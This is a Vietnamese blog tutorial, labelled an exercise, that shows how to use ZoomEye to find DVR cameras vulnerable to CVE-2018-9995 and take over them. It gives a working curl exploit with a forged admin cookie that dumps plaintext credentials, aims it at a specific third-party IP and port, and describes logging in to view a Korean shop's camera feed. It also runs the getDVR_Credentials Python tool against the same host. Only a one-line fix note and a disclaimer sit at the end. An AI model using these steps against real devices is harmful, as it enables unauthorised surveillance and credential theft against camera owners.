Bảo Mật

Bài tập: Dùng ZoomEye Hack Camera bị lỗ hổng CVE-2018-9995

Như bài viết trước, mình đã giới thiệu về ZoomEye – công cụ tìm kiếm dùng cho Hacker. Zoomeye tương tự như Shodan nhưng được phát triển cho thị trường Trung Quốc. Đây là một công cụ tìm kiếm chỉ cần nhập IP hoặc từ khóa, kết quả sẽ hiển thị: các port được mở, các dịch vụ liên quan, vị trí địa lý… Hôm nay chúng ta sẽ thử thực hành dùng ZoomEye để tìm các Camera bị lỗ hổng CVE-2018-9995 và truy cập xem Camera đó.

Tìm Camera bị lỗ hổng CVE-2018-9995 bằng ZoomEye

Đây là lỗ hổng bảo mật được phát hiện vào năm 2018 liên quan đến các đầu ghi Camera DVR. Chỉ bằng 1 dòng lệnh duy nhất bạn có thể xem được tài khoản đăng nhập của Camera không bị mã hóa. Hiện nay trên thế giới còn rất nhiều đầu thu Camera chưa vá lỗi bản này, và chúng ta dễ dàng tìm được bằng công cụ ZoomEye.

Bây giơ chúng ta sẽ thực hành với công cụ tìm kiếm ZoomEye để tìm camera có lỗ hổng CVE-2018-9995.

Mở trang ZoomEye và gõ cụm từ login.rsp để tìm các IP liên quan đến từ khóa này.

zoomeye hack camera

Kết quả sẽ ra một loạt danh sách các địa chỉ IP, bạn click vào dấu mũi tên màu đen để truy cập vào các địa chỉ đó.

cach dung dung zoomeye

Ví dụ chúng ta tìm được IP: http://59.18.152.180:9000. Bây giờ mình sẽ khai thác lỗ hổng tìm để user/password đăng nhập vào Camera này.

Dùng lệnh Curl

Sử dụng cú pháp:

curl "http://IP:Port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Mở CMD lên và dùng lệnh sau:

curl "http://59.18.152.180:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

hack camera CVE-2018-9995

Có kết quả rồi: uid: là username, còn pwd: là mật khẩu.

Bạn mở trình duyệt Internet Explorer lên, truy cập vào IP camera bị Hack để đăng nhập vào trình điều khiển camera. Nhớ Enable ActiveX trình duyệt lên để xem được hình ảnh nhé.

Bài tập: Dùng ZoomEye Hack Camera bị lỗ hổng CVE-2018-9995 4

Và đây là Camera của một cửa hàng nào đó, ở Hàn Quốc.

camera zoomeye

Dùng Tool getDVR_Credentials

Đây là công cụ bằng python dùng để tìm username/password của các Camera bị lỗ hổng CVE-2018-9995. Do đó yêu cầu bạn đã cài Python trên máy tính. Tool này có thể hoạt động trên Windows.

Trước tiên bạn tải Tool getDVR_Credentials. Giải nén vào ổ C:, mở CMD lên truy cập đến đường dẫn giải nén:

cd C:CVE-2018-9995_dvr_credentials-dev_tool

pip install -r requirements

python getDVR_Credentials.py --host IP --port Port //IP và Port của Camera.

Ví dụ trường hợp trên ta sẽ gõ lệnh

python getDVR_Credentials.py --host 59.18.152.180 --port 9000

Và đây là kết quả:

hack camera CVE-2018-9995

Cách khắc phục lỗ hổng CVE-2018-9995: Đổi tài khoản đăng nhập và cập nhật Camera lên Firmware mới nhất.

Khi phát hiện camera bị lỗ hổng, hãy cố gắng báo cho chủ sở hữu biết để họ liên hệ kỹ thuật xử lý.

Mặc dù được coi là một công cụ tìm kiếm “thân thiện với hacker”, ZoomEye không được thiết kế để bắt đầu các cuộc tấn công vào các thiết bị mạng hoặc trang web. Dữ liệu được ghi lại chỉ dành cho nghiên cứu bảo mật.Và bài viết này chủ yếu vào mục đích nghiên cứu, vui lòng không làm dụng để vi phạm pháp luật

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button